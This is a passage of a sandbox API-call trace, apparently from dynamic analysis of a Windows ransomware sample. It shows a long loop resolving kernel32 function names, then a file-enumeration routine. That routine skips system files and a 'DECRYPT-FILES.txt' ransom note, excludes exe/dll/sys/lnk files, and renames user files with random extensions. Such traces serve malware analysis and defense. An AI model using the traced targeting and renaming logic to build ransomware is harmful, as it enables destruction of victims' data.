lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0079.784] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0079.784] lstrlenA (lpString="CREATEJOBSET") returned 12 [0079.784] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0079.784] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0079.784] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0079.784] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0079.784] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0079.784] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0079.784] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0079.784] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0079.784] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0079.784] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0079.784] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0079.784] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0079.784] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0079.784] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0079.784] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0079.784] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0079.784] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0079.785] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0079.785] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0079.785] lstrlenA (lpString="CREATEPIPE") returned 10 [0079.785] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0079.785] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0079.785] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0079.785] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0079.785] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0079.785] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0079.785] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0079.785] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0079.785] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0079.785] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0079.785] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0079.785] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0079.785] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0079.785] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0079.785] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0079.785] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0079.785] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0079.785] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0079.785] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0079.785] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0079.785] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0079.785] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0079.785] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0079.785] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0079.785] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0079.785] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0079.785] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0079.785] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0079.785] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0079.785] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0079.785] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0079.785] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0079.785] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0079.786] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0079.786] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0079.786] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0079.786] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0079.786] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0079.786] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0079.786] lstrlenA (lpString="CREATETHREAD") returned 12 [0079.786] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0079.786] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0079.786] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0079.786] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0079.786] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0079.786] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0079.786] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0079.786] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0079.786] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0079.786] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0079.786] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0079.786] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0079.786] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0079.786] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0079.786] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0079.786] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0079.786] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0079.786] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0079.786] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0079.786] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0079.786] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0079.786] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0079.786] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0079.786] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0079.786] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0079.786] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0079.786] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0079.786] lstrlenA (lpString="CTRLROUTINE") returned 11 [0079.786] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0079.786] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0079.786] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0079.787] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0079.787] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0079.787] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0079.787] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0079.787] lstrlenA (lpString="DEBUGBREAK") returned 10 [0079.787] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0079.787] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0079.787] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0079.787] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0079.787] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0079.787] lstrlenA (lpString="DECODEPOINTER") returned 13 [0079.787] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0079.787] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0079.787] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0079.787] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0079.787] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0079.787] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0079.787] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0079.787] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0079.787] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0079.787] lstrlenA (lpString="DELETEATOM") returned 10 [0079.787] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0079.787] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0079.787] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0079.787] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0079.787] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0079.787] lstrlenA (lpString="DELETEFIBER") returned 11 [0079.787] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0079.787] lstrlenA (lpString="DELETEFILEA") returned 11 [0079.787] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0079.787] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0079.787] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0079.787] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0079.787] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0079.787] lstrlenA (lpString="DELETEFILEW") returned 11 [0079.787] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0079.787] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0079.788] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0079.788] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0079.788] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0079.788] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0079.788] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0079.788] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0079.788] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0079.788] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0079.788] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0079.788] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0079.788] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0079.788] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0079.788] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0079.788] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0079.788] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0079.788] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0079.788] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0079.788] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0079.788] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0079.788] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0079.788] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0079.788] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0079.788] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0079.788] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0079.788] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0079.788] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0079.788] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0079.788] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0079.788] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0079.788] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0079.788] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0079.788] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0079.788] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0079.788] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0079.788] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0079.788] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0079.789] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0079.789] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0079.789] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0079.789] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0079.789] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0079.789] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0079.789] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0079.789] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0079.789] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0079.789] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0079.789] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0079.789] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0079.789] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0079.789] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0079.789] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0079.789] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0079.789] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0079.789] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0079.789] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0079.789] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0079.789] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0079.789] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0079.789] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0079.789] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0079.789] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0079.789] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0079.789] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0079.789] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0079.789] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0079.789] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0079.790] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\Documents.library-ms") returned 94 [0079.790] wsprintfW (in: param_1=0x3f2d730, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\Documents.library-ms.7KLNu") returned 100 [0079.790] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\Documents.library-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\libraries\\documents.library-ms"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\Documents.library-ms.7KLNu" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\libraries\\documents.library-ms.7klnu"), dwFlags=0x0) returned 1 [0079.791] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.791] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.791] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.792] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xabbda0c0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xabbda0c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xabbda0c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0079.792] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0079.792] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0079.792] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0079.792] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0079.792] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0079.792] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0079.792] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0079.792] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0079.792] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0079.792] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0079.792] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0079.792] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0079.792] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0079.792] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0079.792] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0079.792] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\") returned 74 [0079.792] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0079.792] lstrcpyW (in: lpString1=0x3f2df30, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\" [0079.792] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\jkbimi8.tmp" [0079.792] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0079.793] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\libraries\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0079.793] CloseHandle (hObject=0x0) returned 0 [0079.793] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.793] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x28d97bc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2d22d5a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Music.library-ms", cAlternateFileName="MUSIC~1.LIB")) returned 1 [0079.793] lstrcmpiW (lpString1="Music.library-ms", lpString2="DECRYPT-FILES.txt") returned 1 [0079.793] lstrcmpiW (lpString1="Music.library-ms", lpString2="autorun.inf") returned 1 [0079.793] lstrcmpiW (lpString1="Music.library-ms", lpString2="boot.ini") returned 1 [0079.793] lstrcmpiW (lpString1="Music.library-ms", lpString2="desktop.ini") returned 1 [0079.793] lstrcmpiW (lpString1="Music.library-ms", lpString2="ntuser.dat") returned -1 [0079.793] lstrcmpiW (lpString1="Music.library-ms", lpString2="iconcache.db") returned 1 [0079.793] lstrcmpiW 